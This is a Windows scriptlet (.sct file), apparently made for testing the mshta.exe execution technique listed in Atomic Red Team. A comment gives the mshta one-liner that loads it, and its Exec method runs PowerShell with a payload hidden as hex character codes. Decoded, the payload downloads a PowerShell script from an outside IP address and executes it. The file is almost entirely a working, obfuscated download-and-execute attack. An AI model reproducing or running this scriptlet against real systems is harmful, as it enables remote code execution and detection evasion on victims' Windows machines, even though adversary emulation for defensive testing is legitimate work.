<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run('powershell.exe /c -jOiN ( ( 49 ,45 ,58,20 ,27,28,69, 77 ,72, 20, 22 ,68, 74, 74 ,70,'3a','2f' , '2f' ,31, 30 ,'2e', 34, 34,'2e' ,
32, 30 ,31 ,'2e' , 39 ,33,'2f' , 70, '6c','2e' ,70, 73 , 68, 22,29 , 27)|fOrEAcH-OBJeCt { ([ChAR]( [CONvERT]::tO
InT16( ( $_.TOstRiNg() ) ,16 ) ))} ) | iEX');
	}

]]>
</script>

</scriptlet>
